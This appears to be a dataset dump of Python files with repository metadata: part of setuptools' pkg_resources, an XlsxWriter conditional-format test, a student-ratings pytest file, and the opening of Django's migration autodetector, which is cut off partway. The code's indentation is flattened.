OBRACKET = re.compile(r"\s*\[").match
CBRACKET = re.compile(r"\s*\]").match
MODULE = re.compile(r"\w+(\.\w+)*$").match
EGG_NAME = re.compile(
r"(?P<name>[^-]+)"
r"( -(?P<ver>[^-]+) (-py(?P<pyver>[^-]+) (-(?P<plat>.+))? )? )?",
re.VERBOSE | re.IGNORECASE
).match
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = {'pre':'c', 'preview':'c','-':'final-','rc':'c','dev':'@'}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part,part)
if not part or part=='.':
continue
if part[:1] in '0123456789':
yield part.zfill(8) # pad for numeric comparison
else:
yield '*'+part
yield '*final' # ensure that alpha/beta/candidate are before final
def parse_version(s):
"""Convert a version string to a chronologically-sortable key
This is a rough cross between distutils' StrictVersion and LooseVersion;
if you give it versions that would work with StrictVersion, then it behaves
the same; otherwise it acts like a slightly-smarter LooseVersion. It is
*possible* to create pathological version coding schemes that will fool
this parser, but they should be very rare in practice.
The returned value will be a tuple of strings. Numeric portions of the
version are padded to 8 digits so they will compare numerically, but
without relying on how numbers compare relative to strings. Dots are
dropped, but dashes are retained. Trailing zeros between alpha segments
or dashes are suppressed, so that e.g. "2.4.0" is considered the same as
"2.4". Alphanumeric parts are lower-cased.
The algorithm assumes that strings like "-" and any alpha string that
alphabetically follows "final" represents a "patch level". So, "2.4-1"
is assumed to be a branch or patch of "2.4", and therefore "2.4.1" is
considered newer than "2.4-1", which in turn is newer than "2.4".
Strings like "a", "b", "c", "alpha", "beta", "candidate" and so on (that
come before "final" alphabetically) are assumed to be pre-release versions,
so that the version "2.4" is considered newer than "2.4a1".
Finally, to handle miscellaneous cases, the strings "pre", "preview", and
"rc" are treated as if they were "c", i.e. as though they were release
candidates, and therefore are not as new as a version string that does not
contain them, and "dev" is replaced with an '@' so that it sorts lower than
than any other pre-release tag.
"""
parts = []
for part in _parse_version_parts(s.lower()):
if part.startswith('*'):
if part<'*final': # remove '-' before a prerelease tag
while parts and parts[-1]=='*final-': parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1]=='00000000':
parts.pop()
parts.append(part)
return tuple(parts)
class EntryPoint(object):
"""Object representing an advertised importable object"""
def __init__(self, name, module_name, attrs=(), extras=(), dist=None):
if not MODULE(module_name):
raise ValueError("Invalid module name", module_name)
self.name = name
self.module_name = module_name
self.attrs = tuple(attrs)
self.extras = Requirement.parse(("x[%s]" % ','.join(extras))).extras
self.dist = dist
def __str__(self):
s = "%s = %s" % (self.name, self.module_name)
if self.attrs:
s += ':' + '.'.join(self.attrs)
if self.extras:
s += ' [%s]' % ','.join(self.extras)
return s
def __repr__(self):
return "EntryPoint.parse(%r)" % str(self)
def load(self, require=True, env=None, installer=None):
if require: self.require(env, installer)
entry = __import__(self.module_name, globals(),globals(), ['__name__'])
for attr in self.attrs:
try:
entry = getattr(entry,attr)
except AttributeError:
raise ImportError("%r has no %r attribute" % (entry,attr))
return entry
def require(self, env=None, installer=None):
if self.extras and not self.dist:
raise UnknownExtra("Can't require() without a distribution", self)
map(working_set.add,
working_set.resolve(self.dist.requires(self.extras),env,installer))
#@classmethod
def parse(cls, src, dist=None):
"""Parse a single entry point from string `src`
Entry point syntax follows the form::
name = some.module:some.attr [extra1,extra2]
The entry name and module name are required, but the ``:attrs`` and
``[extras]`` parts are optional
"""
try:
attrs = extras = ()
name,value = src.split('=',1)
if '[' in value:
value,extras = value.split('[',1)
req = Requirement.parse("x["+extras)
if req.specs: raise ValueError
extras = req.extras
if ':' in value:
value,attrs = value.split(':',1)
if not MODULE(attrs.rstrip()):
raise ValueError
attrs = attrs.rstrip().split('.')
except ValueError:
raise ValueError(
"EntryPoint must be in 'name=module:attrs [extras]' format",
src
)
else:
return cls(name.strip(), value.strip(), attrs, extras, dist)
parse = classmethod(parse)
#@classmethod
def parse_group(cls, group, lines, dist=None):
"""Parse an entry point group"""
if not MODULE(group):
raise ValueError("Invalid group name", group)
this = {}
for line in yield_lines(lines):
ep = cls.parse(line, dist)
if ep.name in this:
raise ValueError("Duplicate entry point", group, ep.name)
this[ep.name]=ep
return this
parse_group = classmethod(parse_group)
#@classmethod
def parse_map(cls, data, dist=None):
"""Parse a map of entry point groups"""
if isinstance(data,dict):
data = data.items()
else:
data = split_sections(data)
maps = {}
for group, lines in data:
if group is None:
if not lines:
continue
raise ValueError("Entry points must be listed in groups")
group = group.strip()
if group in maps:
raise ValueError("Duplicate group name", group)
maps[group] = cls.parse_group(group, lines, dist)
return maps
parse_map = classmethod(parse_map)
def _remove_md5_fragment(location):
if not location:
return ''
parsed = urlparse(location)
if parsed[-1].startswith('md5='):
return urlunparse(parsed[:-1] + ('',))
return location
class Distribution(object):
"""Wrap an actual or potential sys.path entry w/metadata"""
def __init__(self,
location=None, metadata=None, project_name=None, version=None,
py_version=PY_MAJOR, platform=None, precedence = EGG_DIST
):
self.project_name = safe_name(project_name or 'Unknown')
if version is not None:
self._version = safe_version(version)
self.py_version = py_version
self.platform = platform
self.location = location
self.precedence = precedence
self._provider = metadata or empty_provider
#@classmethod
def from_location(cls,location,basename,metadata=None,**kw):
project_name, version, py_version, platform = [None]*4
basename, ext = os.path.splitext(basename)
if ext.lower() in (".egg",".egg-info"):
match = EGG_NAME(basename)
if match:
project_name, version, py_version, platform = match.group(
'name','ver','pyver','plat'
)
return cls(
location, metadata, project_name=project_name, version=version,
py_version=py_version, platform=platform, **kw
)
from_location = classmethod(from_location)
hashcmp = property(
lambda self: (
getattr(self,'parsed_version',()),
self.precedence,
self.key,
_remove_md5_fragment(self.location),
self.py_version,
self.platform
)
)
def __hash__(self): return hash(self.hashcmp)
def __lt__(self, other):
return self.hashcmp < other.hashcmp
def __le__(self, other):
return self.hashcmp <= other.hashcmp
def __gt__(self, other):
return self.hashcmp > other.hashcmp
def __ge__(self, other):
return self.hashcmp >= other.hashcmp
def __eq__(self, other):
if not isinstance(other, self.__class__):
# It's not a Distribution, so they are not equal
return False
return self.hashcmp == other.hashcmp
def __ne__(self, other):
return not self == other
# These properties have to be lazy so that we don't have to load any
# metadata until/unless it's actually needed. (i.e., some distributions
# may not know their name or version without loading PKG-INFO)
#@property
def key(self):
try:
return self._key
except AttributeError:
self._key = key = self.project_name.lower()
return key
key = property(key)
#@property
def parsed_version(self):
try:
return self._parsed_version
except AttributeError:
self._parsed_version = pv = parse_version(self.version)
return pv
parsed_version = property(parsed_version)
#@property
def version(self):
try:
return self._version
except AttributeError:
for line in self._get_metadata('PKG-INFO'):
if line.lower().startswith('version:'):
self._version = safe_version(line.split(':',1)[1].strip())
return self._version
else:
raise ValueError(
"Missing 'Version:' header and/or PKG-INFO file", self
)
version = property(version)
#@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
dm = self.__dep_map = {None: []}
for name in 'requires.txt', 'depends.txt':
for extra,reqs in split_sections(self._get_metadata(name)):
if extra: extra = safe_extra(extra)
dm.setdefault(extra,[]).extend(parse_requirements(reqs))
return dm
_dep_map = property(_dep_map)
def requires(self,extras=()):
"""List of Requirements needed for this distro if `extras` are used"""
dm = self._dep_map
deps = []
deps.extend(dm.get(None,()))
for ext in extras:
try:
deps.extend(dm[safe_extra(ext)])
except KeyError:
raise UnknownExtra(
"%s has no such extra feature %r" % (self, ext)
)
return deps
def _get_metadata(self,name):
if self.has_metadata(name):
for line in self.get_metadata_lines(name):
yield line
def activate(self,path=None):
"""Ensure distribution is importable on `path` (default=sys.path)"""
if path is None: path = sys.path
self.insert_on(path)
if path is sys.path:
fixup_namespace_packages(self.location)
map(declare_namespace, self._get_metadata('namespace_packages.txt'))
def egg_name(self):
"""Return what this distribution's standard .egg filename should be"""
filename = "%s-%s-py%s" % (
to_filename(self.project_name), to_filename(self.version),
self.py_version or PY_MAJOR
)
if self.platform:
filename += '-'+self.platform
return filename
def __repr__(self):
if self.location:
return "%s (%s)" % (self,self.location)
else:
return str(self)
def __str__(self):
try: version = getattr(self,'version',None)
except ValueError: version = None
version = version or "[unknown version]"
return "%s %s" % (self.project_name,version)
def __getattr__(self,attr):
"""Delegate all unrecognized public attributes to .metadata provider"""
if attr.startswith('_'):
raise AttributeError,attr
return getattr(self._provider, attr)
#@classmethod
def from_filename(cls,filename,metadata=None, **kw):
return cls.from_location(
_normalize_cached(filename), os.path.basename(filename), metadata,
**kw
)
from_filename = classmethod(from_filename)
def as_requirement(self):
"""Return a ``Requirement`` that matches this distribution exactly"""
return Requirement.parse('%s==%s' % (self.project_name, self.version))
def load_entry_point(self, group, name):
"""Return the `name` entry point of `group` or raise ImportError"""
ep = self.get_entry_info(group,name)
if ep is None:
raise ImportError("Entry point %r not found" % ((group,name),))
return ep.load()
def get_entry_map(self, group=None):
"""Return the entry point map for `group`, or the full entry map"""
try:
ep_map = self._ep_map
except AttributeError:
ep_map = self._ep_map = EntryPoint.parse_map(
self._get_metadata('entry_points.txt'), self
)
if group is not None:
return ep_map.get(group,{})
return ep_map
def get_entry_info(self, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return self.get_entry_map(group).get(name)
def insert_on(self, path, loc = None):
"""Insert self.location in path before its nearest parent directory"""
loc = loc or self.location
if self.project_name == 'setuptools':
try:
version = self.version
except ValueError:
version = ''
if version.startswith('0.7'):
raise ValueError(
"A 0.7-series setuptools cannot be installed "
"with distribute. Found one at %s" % str(self.location))
if not loc:
return
if path is sys.path:
self.check_version_conflict()
nloc = _normalize_cached(loc)
bdir = os.path.dirname(nloc)
npath= map(_normalize_cached, path)
bp = None
for p, item in enumerate(npath):
if item==nloc:
break
elif item==bdir and self.precedence==EGG_DIST:
# if it's an .egg, give it precedence over its directory
path.insert(p, loc)
npath.insert(p, nloc)
break
else:
path.append(loc)
return
# p is the spot where we found or inserted loc; now remove duplicates
while 1:
try:
np = npath.index(nloc, p+1)
except ValueError:
break
else:
del npath[np], path[np]
p = np # ha!
return
def check_version_conflict(self):
if self.key=='distribute':
return # ignore the inevitable setuptools self-conflicts :(
nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt'))
loc = normalize_path(self.location)
for modname in self._get_metadata('top_level.txt'):
if (modname not in sys.modules or modname in nsp
or modname in _namespace_packages
):
continue
if modname in ('pkg_resources', 'setuptools', 'site'):
continue
fn = getattr(sys.modules[modname], '__file__', None)
if fn and (normalize_path(fn).startswith(loc) or
fn.startswith(self.location)):
continue
issue_warning(
"Module %s was already imported from %s, but %s is being added"
" to sys.path" % (modname, fn, self.location),
)
def has_version(self):
try:
self.version
except ValueError:
issue_warning("Unbuilt egg for "+repr(self))
return False
return True
def clone(self,**kw):
"""Copy this distribution, substituting in any changed keyword args"""
for attr in (
'project_name', 'version', 'py_version', 'platform', 'location',
'precedence'
):
kw.setdefault(attr, getattr(self,attr,None))
kw.setdefault('metadata', self._provider)
return self.__class__(**kw)
#@property
def extras(self):
return [dep for dep in self._dep_map if dep]
extras = property(extras)
def issue_warning(*args,**kw):
level = 1
g = globals()
try:
# find the first stack frame that is *not* code in
# the pkg_resources module, to use for the warning
while sys._getframe(level).f_globals is g:
level += 1
except ValueError:
pass
from warnings import warn
warn(stacklevel = level+1, *args, **kw)
def parse_requirements(strs):
"""Yield ``Requirement`` objects for each specification in `strs`
`strs` must be an instance of ``basestring``, or a (possibly-nested)
iterable thereof.
"""
# create a steppable iterator, so we can handle \-continuations
lines = iter(yield_lines(strs))
def scan_list(ITEM,TERMINATOR,line,p,groups,item_name):
items = []
while not TERMINATOR(line,p):
if CONTINUE(line,p):
try:
line = lines.next(); p = 0
except StopIteration:
raise ValueError(
"\\ must not appear on the last nonblank line"
)
match = ITEM(line,p)
if not match:
raise ValueError("Expected "+item_name+" in",line,"at",line[p:])
items.append(match.group(*groups))
p = match.end()
match = COMMA(line,p)
if match:
p = match.end() # skip the comma
elif not TERMINATOR(line,p):
raise ValueError(
"Expected ',' or end-of-list in",line,"at",line[p:]
)
match = TERMINATOR(line,p)
if match: p = match.end() # skip the terminator, if any
return line, p, items
for line in lines:
match = DISTRO(line)
if not match:
raise ValueError("Missing distribution spec", line)
project_name = match.group(1)
p = match.end()
extras = []
match = OBRACKET(line,p)
if match:
p = match.end()
line, p, extras = scan_list(
DISTRO, CBRACKET, line, p, (1,), "'extra' name"
)
line, p, specs = scan_list(VERSION,LINE_END,line,p,(1,2),"version spec")
specs = [(op,safe_version(val)) for op,val in specs]
yield Requirement(project_name, specs, extras)
def _sort_dists(dists):
tmp = [(dist.hashcmp,dist) for dist in dists]
tmp.sort()
dists[::-1] = [d for hc,d in tmp]
class Requirement:
def __init__(self, project_name, specs, extras):
"""DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!"""
self.unsafe_name, project_name = project_name, safe_name(project_name)
self.project_name, self.key = project_name, project_name.lower()
index = [(parse_version(v),state_machine[op],op,v) for op,v in specs]
index.sort()
self.specs = [(op,ver) for parsed,trans,op,ver in index]
self.index, self.extras = index, tuple(map(safe_extra,extras))
self.hashCmp = (
self.key, tuple([(op,parsed) for parsed,trans,op,ver in index]),
frozenset(self.extras)
)
self.__hash = hash(self.hashCmp)
def __str__(self):
specs = ','.join([''.join(s) for s in self.specs])
extras = ','.join(self.extras)
if extras: extras = '[%s]' % extras
return '%s%s%s' % (self.project_name, extras, specs)
def __eq__(self,other):
return isinstance(other,Requirement) and self.hashCmp==other.hashCmp
def __contains__(self,item):
if isinstance(item,Distribution):
if item.key <> self.key: return False
if self.index: item = item.parsed_version # only get if we need it
elif isinstance(item,basestring):
item = parse_version(item)
last = None
compare = lambda a, b: (a > b) - (a < b) # -1, 0, 1
for parsed,trans,op,ver in self.index:
action = trans[compare(item,parsed)] # Indexing: 0, 1, -1
if action=='F': return False
elif action=='T': return True
elif action=='+': last = True
elif action=='-' or last is None: last = False
if last is None: last = True # no rules encountered
return last
def __hash__(self):
return self.__hash
def __repr__(self): return "Requirement.parse(%r)" % str(self)
#@staticmethod
def parse(s, replacement=True):
reqs = list(parse_requirements(s))
if reqs:
if len(reqs) == 1:
founded_req = reqs[0]
# if asked for setuptools distribution
# and if distribute is installed, we want to give
# distribute instead
if _override_setuptools(founded_req) and replacement:
distribute = list(parse_requirements('distribute'))
if len(distribute) == 1:
return distribute[0]
return founded_req
else:
return founded_req
raise ValueError("Expected only one requirement", s)
raise ValueError("No requirements found", s)
parse = staticmethod(parse)
state_machine = {
# =><
'<' : '--T',
'<=': 'T-T',
'>' : 'F+F',
'>=': 'T+F',
'==': 'T..',
'!=': 'F++',
}
def _override_setuptools(req):
"""Return True when distribute wants to override a setuptools dependency.
We want to override when the requirement is setuptools and the version is
a variant of 0.6.
"""
if req.project_name == 'setuptools':
if not len(req.specs):
# Just setuptools: ok
return True
for comparator, version in req.specs:
if comparator in ['==', '>=', '>']:
if version.startswith('0.7'):
# We want some setuptools not from the 0.6 series.
return False
return True
return False
def _get_mro(cls):
"""Get an mro for a type or classic class"""
if not isinstance(cls,type):
class cls(cls,object): pass
return cls.__mro__[1:]
return cls.__mro__
def _find_adapter(registry, ob):
"""Return an adapter factory for `ob` from `registry`"""
for t in _get_mro(getattr(ob, '__class__', type(ob))):
if t in registry:
return registry[t]
def ensure_directory(path):
"""Ensure that the parent directory of `path` exists"""
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
def split_sections(s):
"""Split a string or iterable thereof into (section,content) pairs
Each ``section`` is a stripped version of the section header ("[section]")
and each ``content`` is a list of stripped lines excluding blank lines and
comment-only lines. If there are any such lines before the first section
header, they're returned in a first ``section`` of ``None``.
"""
section = None
content = []
for line in yield_lines(s):
if line.startswith("["):
if line.endswith("]"):
if section or content:
yield section, content
section = line[1:-1].strip()
content = []
else:
raise ValueError("Invalid section heading", line)
else:
content.append(line)
# wrap up last segment
yield section, content
def _mkstemp(*args,**kw):
from tempfile import mkstemp
old_open = os.open
try:
os.open = os_open # temporarily bypass sandboxing
return mkstemp(*args,**kw)
finally:
os.open = old_open # and then put it back
# Set up global resource manager
_manager = ResourceManager()
def _initialize(g):
for name in dir(_manager):
if not name.startswith('_'):
g[name] = getattr(_manager, name)
_initialize(globals())
# Prepare the master working set and make the ``require()`` API available
working_set = WorkingSet()
try:
# Does the main program list any requirements?
from __main__ import __requires__
except ImportError:
pass # No: just use the default working set based on sys.path
else:
# Yes: ensure the requirements are met, by prefixing sys.path if necessary
try:
working_set.require(__requires__)
except VersionConflict: # try it without defaults already on sys.path
working_set = WorkingSet([]) # by starting with an empty path
for dist in working_set.resolve(
parse_requirements(__requires__), Environment()
):
working_set.add(dist)
for entry in sys.path: # add any missing entries from sys.path
if entry not in working_set.entries:
working_set.add_entry(entry)
sys.path[:] = working_set.entries # then copy back to sys.path
require = working_set.require
iter_entry_points = working_set.iter_entry_points
add_activation_listener = working_set.subscribe
run_script = working_set.run_script
run_main = run_script # backward compatibility
# Activate all distributions already on sys.path, and ensure that
# all distributions added to the working set in the future (e.g. by
# calling ``require()``) will get activated as well.
add_activation_listener(lambda dist: dist.activate())
working_set.entries=[]; map(working_set.add_entry,sys.path) # match order
| 32.909596 | 94 | 0.618815 |
8a1a7080fe7cd3a52801cb83158be8200f30f2f1 | 4,460 | py | Python | xlsxwriter/test/worksheet/test_cond_format12.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | xlsxwriter/test/worksheet/test_cond_format12.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | xlsxwriter/test/worksheet/test_cond_format12.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...worksheet import Worksheet
class TestAssembleWorksheet(unittest.TestCase):
"""
Test assembling a complete Worksheet file.
"""
def test_assemble_xml_file(self):
"""Test writing a worksheet with conditional formatting."""
self.maxDiff = None
fh = StringIO()
worksheet = Worksheet()
worksheet._set_filehandle(fh)
worksheet.select()
worksheet.write('A1', 1)
worksheet.write('A2', 2)
worksheet.write('A3', 3)
worksheet.write('A4', 4)
worksheet.write('A5', 5)
worksheet.write('A6', 6)
worksheet.write('A7', 7)
worksheet.write('A8', 8)
worksheet.write('A9', 9)
worksheet.write('A10', 10)
worksheet.write('A11', 11)
worksheet.write('A12', 12)
worksheet.conditional_format('A1:A12', {'type': '2_color_scale'})
worksheet._assemble_xml_file()
exp = _xml_to_list("""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<dimension ref="A1:A12"/>
<sheetViews>
<sheetView tabSelected="1" workbookViewId="0"/>
</sheetViews>
<sheetFormatPr defaultRowHeight="15"/>
<sheetData>
<row r="1" spans="1:1">
<c r="A1">
<v>1</v>
</c>
</row>
<row r="2" spans="1:1">
<c r="A2">
<v>2</v>
</c>
</row>
<row r="3" spans="1:1">
<c r="A3">
<v>3</v>
</c>
</row>
<row r="4" spans="1:1">
<c r="A4">
<v>4</v>
</c>
</row>
<row r="5" spans="1:1">
<c r="A5">
<v>5</v>
</c>
</row>
<row r="6" spans="1:1">
<c r="A6">
<v>6</v>
</c>
</row>
<row r="7" spans="1:1">
<c r="A7">
<v>7</v>
</c>
</row>
<row r="8" spans="1:1">
<c r="A8">
<v>8</v>
</c>
</row>
<row r="9" spans="1:1">
<c r="A9">
<v>9</v>
</c>
</row>
<row r="10" spans="1:1">
<c r="A10">
<v>10</v>
</c>
</row>
<row r="11" spans="1:1">
<c r="A11">
<v>11</v>
</c>
</row>
<row r="12" spans="1:1">
<c r="A12">
<v>12</v>
</c>
</row>
</sheetData>
<conditionalFormatting sqref="A1:A12">
<cfRule type="colorScale" priority="1">
<colorScale>
<cfvo type="min" val="0"/>
<cfvo type="max" val="0"/>
<color rgb="FFFF7128"/>
<color rgb="FFFFEF9C"/>
</colorScale>
</cfRule>
</conditionalFormatting>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</worksheet>
""")
got = _xml_to_list(fh.getvalue())
self.assertEqual(got, exp)
| 33.533835 | 171 | 0.354933 |
d82b53c06ea25d76341622c93e14f15b5f8a325d | 1,340 | py | Python | test/test_GetStudents3Q.py | Vsevolearn/PTLab1 | 5cc51f6beb7fe82b61a2ef839a9408c0d17fe485 | [
"MIT"
] | null | null | null | test/test_GetStudents3Q.py | Vsevolearn/PTLab1 | 5cc51f6beb7fe82b61a2ef839a9408c0d17fe485 | [
"MIT"
] | null | null | null | test/test_GetStudents3Q.py | Vsevolearn/PTLab1 | 5cc51f6beb7fe82b61a2ef839a9408c0d17fe485 | [
"MIT"
] | 1 | 2021-12-03T01:11:01.000Z | 2021-12-03T01:11:01.000Z | from typing import Dict, Tuple
from Types import DataType
from CalcRating import CalcRating
from GetStudents3Q import GetStudents3Q
import pytest
RatingsType = Dict[str, float]
class TestStudents3Q():
@pytest.fixture()
def input_data(self) -> Tuple[DataType, RatingsType]:
rating_scores: RatingsType = {
'Иванов Иван Иванович': 82.0,
'Петров1 Петр Петрович': 63.333333333333336,
'Петров2 Петр Петрович': 76.0,
'Петров3 Петр Петрович': 89.33333333333333,
'Петров4 Петр Петрович': 91.66666666666667
}
student_list: RatingsType = {
'Иванов Иван Иванович': 82.0,
'Петров3 Петр Петрович': 89.33333333333333
}
return rating_scores, student_list
def test_init_get_students_3q(self, input_data:
Tuple[RatingsType, RatingsType]) -> None:
rating_scores = GetStudents3Q(input_data[0])
assert input_data[0] == rating_scores.rating
def test_get(self, input_data:
Tuple[DataType, RatingsType]) -> None:
student_list = GetStudents3Q(input_data[0]).get()
for student in student_list.keys():
rating = student_list[student]
assert pytest.approx(
rating, abs=0.001) == input_data[1][student]
| 36.216216 | 75 | 0.630597 |
95ef890ac69ce222ff2e3c487ae6b7f9c0bd29fe | 51,313 | py | Python | django/db/migrations/autodetector.py | HenriqueLR/django | d1ca70110f49f0be90206c8da516ac16aebc8c75 | [
"BSD-3-Clause"
] | 2 | 2015-01-21T15:45:07.000Z | 2015-02-21T02:38:13.000Z | django/db/migrations/autodetector.py | HenriqueLR/django | d1ca70110f49f0be90206c8da516ac16aebc8c75 | [
"BSD-3-Clause"
] | null | null | null | django/db/migrations/autodetector.py | HenriqueLR/django | d1ca70110f49f0be90206c8da516ac16aebc8c75 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import unicode_literals
import re
import datetime
from itertools import chain
from django.utils import six
from django.db import models
from django.conf import settings
from django.db.migrations import operations
from django.db.migrations.migration import Migration
from django.db.migrations.questioner import MigrationQuestioner
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.operations.models import AlterModelOptions
class MigrationAutodetector(object):
"""
Takes a pair of ProjectStates, and compares them to see what the
first would need doing to make it match the second (the second
usually being the project's current state).
Note that this naturally operates on entire projects at a time,
as it's likely that changes interact (for example, you can't
add a ForeignKey without having a migration to add the table it
depends on first). A user interface may offer single-app usage
if it wishes, with the caveat that it may not always be possible.
"""
def __init__(self, from_state, to_state, questioner=None):
self.from_state = from_state
self.to_state = to_state
self.questioner = questioner or MigrationQuestioner()
def changes(self, graph, trim_to_apps=None, convert_apps=None, migration_name=None):
"""
Main entry point to produce a list of appliable changes.
Takes a graph to base names on and an optional set of apps
to try and restrict to (restriction is not guaranteed)
"""
changes = self._detect_changes(convert_apps, graph)
changes = self.arrange_for_graph(changes, graph, migration_name)
if trim_to_apps:
changes = self._trim_to_apps(changes, trim_to_apps)
return changes
def deep_deconstruct(self, obj):
"""
Recursive deconstruction for a field and its arguments.
Used for full comparison for rename/alter; sometimes a single-level
deconstruction will not compare correctly.
"""
if not hasattr(obj, 'deconstruct') or isinstance(obj, type):
return obj
deconstructed = obj.deconstruct()
if isinstance(obj, models.Field):
# we have a field which also returns a name
deconstructed = deconstructed[1:]
path, args, kwargs = deconstructed
return (
path,
[self.deep_deconstruct(value) for value in args],
dict(
(key, self.deep_deconstruct(value))
for key, value in kwargs.items()
),
)
def only_relation_agnostic_fields(self, fields):
"""
Return a definition of the fields that ignores field names and
what related fields actually relate to.
Used for detecting renames (as, of course, the related fields
change during renames)
"""
fields_def = []
for name, field in fields:
deconstruction = self.deep_deconstruct(field)
if field.rel and field.rel.to:
del deconstruction[2]['to']
fields_def.append(deconstruction)
return fields_def
def _detect_changes(self, convert_apps=None, graph=None):
"""
Returns a dict of migration plans which will achieve the
change from from_state to to_state. The dict has app labels
as keys and a list of migrations as values.
The resulting migrations aren't specially named, but the names
do matter for dependencies inside the set.
convert_apps is the list of apps to convert to use migrations
(i.e. to make initial migrations for, in the usual case)
graph is an optional argument that, if provided, can help improve
dependency generation and avoid potential circular dependencies.
"""
# The first phase is generating all the operations for each app
# and gathering them into a big per-app list.
# We'll then go through that list later and order it and split
# into migrations to resolve dependencies caused by M2Ms and FKs.
self.generated_operations = {}
# Prepare some old/new state and model lists, separating
# proxy models and ignoring unmigrated apps.
self.old_apps = self.from_state.render(ignore_swappable=True)
self.new_apps = self.to_state.render()
self.old_model_keys = []
self.old_proxy_keys = []
self.old_unmanaged_keys = []
self.new_model_keys = []
self.new_proxy_keys = []
self.new_unmanaged_keys = []
for al, mn in sorted(self.from_state.models.keys()):
model = self.old_apps.get_model(al, mn)
if not model._meta.managed:
self.old_unmanaged_keys.append((al, mn))
elif al not in self.from_state.real_apps:
if model._meta.proxy:
self.old_proxy_keys.append((al, mn))
else:
self.old_model_keys.append((al, mn))
for al, mn in sorted(self.to_state.models.keys()):
model = self.new_apps.get_model(al, mn)
if not model._meta.managed:
self.new_unmanaged_keys.append((al, mn))
elif (
al not in self.from_state.real_apps or
(convert_apps and al in convert_apps)
):
if model._meta.proxy:
self.new_proxy_keys.append((al, mn))
else:
self.new_model_keys.append((al, mn))
# Renames have to come first
self.generate_renamed_models()
# Prepare field lists, and prepare a list of the fields that used
# through models in the old state so we can make dependencies
# from the through model deletion to the field that uses it.
self.kept_model_keys = set(self.old_model_keys).intersection(self.new_model_keys)
self.kept_proxy_keys = set(self.old_proxy_keys).intersection(self.new_proxy_keys)
self.kept_unmanaged_keys = set(self.old_unmanaged_keys).intersection(self.new_unmanaged_keys)
self.through_users = {}
self.old_field_keys = set()
self.new_field_keys = set()
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
self.old_field_keys.update((app_label, model_name, x) for x, y in old_model_state.fields)
self.new_field_keys.update((app_label, model_name, x) for x, y in new_model_state.fields)
# Through model map generation
for app_label, model_name in sorted(self.old_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
for field_name, field in old_model_state.fields:
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field_by_name(field_name)[0]
if hasattr(old_field, "rel") and getattr(old_field.rel, "through", None) and not old_field.rel.through._meta.auto_created:
through_key = (
old_field.rel.through._meta.app_label,
old_field.rel.through._meta.object_name.lower(),
)
self.through_users[through_key] = (app_label, old_model_name, field_name)
# Generate non-rename model operations
self.generate_deleted_models()
self.generate_created_models()
self.generate_deleted_proxies()
self.generate_created_proxies()
self.generate_altered_options()
# Generate field operations
self.generate_renamed_fields()
self.generate_removed_fields()
self.generate_added_fields()
self.generate_altered_fields()
self.generate_altered_unique_together()
self.generate_altered_index_together()
self.generate_altered_order_with_respect_to()
# Now, reordering to make things possible. The order we have already
# isn't bad, but we need to pull a few things around so FKs work nicely
# inside the same app
for app_label, ops in sorted(self.generated_operations.items()):
for i in range(10000):
found = False
for i, op in enumerate(ops):
for dep in op._auto_deps:
if dep[0] == app_label:
# Alright, there's a dependency on the same app.
for j, op2 in enumerate(ops):
if self.check_dependency(op2, dep) and j > i:
ops = ops[:i] + ops[i + 1:j + 1] + [op] + ops[j + 1:]
found = True
break
if found:
break
if found:
break
if not found:
break
else:
raise ValueError("Infinite loop caught in operation dependency resolution")
self.generated_operations[app_label] = ops
# Now, we need to chop the lists of operations up into migrations with
# dependencies on each other.
# We do this by stepping up an app's list of operations until we
# find one that has an outgoing dependency that isn't in another app's
# migration yet (hasn't been chopped off its list). We then chop off the
# operations before it into a migration and move onto the next app.
# If we loop back around without doing anything, there's a circular
# dependency (which _should_ be impossible as the operations are all
# split at this point so they can't depend and be depended on)
self.migrations = {}
num_ops = sum(len(x) for x in self.generated_operations.values())
chop_mode = False
while num_ops:
# On every iteration, we step through all the apps and see if there
# is a completed set of operations.
# If we find that a subset of the operations are complete we can
# try to chop it off from the rest and continue, but we only
# do this if we've already been through the list once before
# without any chopping and nothing has changed.
for app_label in sorted(self.generated_operations.keys()):
chopped = []
dependencies = set()
for operation in list(self.generated_operations[app_label]):
deps_satisfied = True
operation_dependencies = set()
for dep in operation._auto_deps:
is_swappable_dep = False
if dep[0] == "__setting__":
# We need to temporarily resolve the swappable dependency to prevent
# circular references. While keeping the dependency checks on the
# resolved model we still add the swappable dependencies.
# See #23322
resolved_app_label, resolved_object_name = getattr(settings, dep[1]).split('.')
original_dep = dep
dep = (resolved_app_label, resolved_object_name.lower(), dep[2], dep[3])
is_swappable_dep = True
if dep[0] != app_label and dep[0] != "__setting__":
# External app dependency. See if it's not yet
# satisfied.
for other_operation in self.generated_operations.get(dep[0], []):
if self.check_dependency(other_operation, dep):
